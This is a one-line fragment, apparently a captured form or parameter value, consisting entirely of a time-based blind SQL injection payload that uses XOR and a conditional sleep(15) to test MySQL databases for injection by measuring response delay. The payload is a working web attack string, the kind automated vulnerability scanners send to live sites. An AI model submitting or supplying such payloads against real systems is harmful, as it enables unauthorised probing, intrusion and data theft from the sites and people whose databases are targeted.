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941020"XOR(94102*if(now()=sysdate(),sleep(15),0))XOR"Z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